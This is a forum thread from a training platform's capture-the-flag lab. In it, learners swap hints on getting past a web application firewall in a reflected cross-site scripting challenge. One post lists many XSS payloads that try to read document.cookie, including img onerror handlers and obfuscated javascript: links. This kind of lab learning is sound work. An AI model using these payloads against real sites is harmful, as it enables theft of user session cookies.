I’m trying to bypass WAF in order to capture the flag. I’ve tested all “Guided Exercise” commands. The word “javascript” is blocked by WAF. I also tried to do something like “jaascrpt” or “ja vascri pt” and got nothing. I was wondering if someone could give me a hint, so I can get to the point!
Thanks in Advance!
Hey there - this isn’t really my area of expertise, but working backwards from the instructor’s solution notes, I’d say you don’t necessarily need to use that javascript directive from Part 4 to get the flag.
Broadly speaking, I would recommend:
Seeing which meta characters and special characters work.
Seeing which basic HTML elements work.
Seeing if any attributes work (i.e. src=, data=)
Reviewing the core concept lesson for additional techniques.
It also help to come to this challenge later. All challenge exercises are optional, and you may benefit from completing additional lab work from other parts of the path first.
I tried several possible approaches (such as character code, using decimal,etc.) to bypass, but none of them worked. I’m just curious what was the solution Cybrary expected me to find out.
You are trying to steal the cookie. One hint I can give is that what may not work in the Guided Exercises might just work in the Challenge.
Please write a list of the things you have tried 
I’ll edit them if I think they give too much away
Here are the list of things I’ve tired so far:
asdf>"'<img src=x>
asdf>"'<img src=x onerror=alert(1234);>
asdf>"'<img src=x onerror=console.log(document.cookie);>
asdf>"'<img src=x onerror=document.write(document.cookie);>
asdf>"'<img src=x onerror=prompt(document.cookie);>
asdf>"'<img src=x onaaaaa= >
asdf>"'<a href="">CLICK</a>
asdf>"'<a href="javascript:aaa">CLICK</a>
asdf>"'<a href="javascript:prompt()">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav�Aascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="jav ascript:pro mpt(document.cookie)">CLICK</a>
asdf>"'<a href="jav*ascript:pro*mpt(document.cookie)">CLICK</a>
asdf>"'<a href=""jav"+"ascript":prompt(document.cookie)">CLICK</a>
asdf>"'<a href="top["jav"+"ascript]:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="javascript:prompt(document.cookie)">CLICK</a>
asdf>"'<a href="amF2YXNjcmlwdDpwcm9tcHQoZG9jdW1lbnQuY29va2llKQ==">CLICK</a>
and more.
I also tried in the both Guided and Challenge Exersise lab, but nothing changed.
Thanks for your time!
I sent you a private message
I thought I should use the combination of HTML and Javascript codes somehow. I don’t know if it works by the way.
Thank you.
I have tried so many combinations and nothing has worked so far. It doesnt like the javascript wrapper and I changed that too encoded characters. Tried different event handler combinations too. Prompts are not working either.
Think simpler. Less is more on this one…
1.) Do script tags work? They may not have in the guided exercises but they may here.
2.) You are trying to steal document.cookie
2 Likes
thank you @JosephWhite
1 Like
is there any chance i could get some help? stuck on this for about an hour. tried multiple combinations.. i think i get what you were hinting at regarding trying some things that werent working before with script in lesson 3/4 but might work now like the “console.log(document.cookie” , " document.write(document.cookie)" etc . i think im supposed to use document.write but im not sure because i had the least errors with it..
I tried using a href, tried using onaaaa , alert, etc.. im just confused and i dont know if im ever going in the right direction or not. I see a the CLICK a href thing shows up , but doesnt like the word “javascript” it seemed, so i also tried script.. tried changing capitalization.. i just dont know anymore 
Here is what the challenge author says…
-
See which meta characters and special characters work
-
See which basic HTML elements work
Many do work, when it previously did not. -
See if any attributes work (i.e. src= , data=)
Most should work -
See if event handlers work
-
See if various actions work from before
sadly its too vague for me. i know src=x works, but i have no idea how to turn that into anything that would allow me to read the document.cookie without being able to use an event handler or javascript like the solution was in part 4. i can get the CLICK link to show up if i use a href, but again im not able to weaponize anything from that . ive tried combining and mismatching but i dont understand enough to know what im doing on my own. it basically drops you into the deep end . Is it possible to get a dm or something? im really struggling
for example anything with “asdf>”'" combined with onerror prompt cookie (onerror, onalert, on anything doesnt work)
so i thought to try and combine img src=x with “'<a href=” because it works.. but as soon as i try and use javascript it doesnt work . im guessing this means waf is blocking this word. So how would i be able to proceed ? there was no examples previously showing alternatives. Also how to use data= ? there was also no examples of how to use that to try and get document cookie. there should be more examples of other templates or cheat sheets to try. its too random this challenge it feels like . the possibilities are too endless
i even went elsewhere to look at cheatsheets and reflected xss blogs and im still lost
all event handlers seem to not work (onmouse, onalert, on x)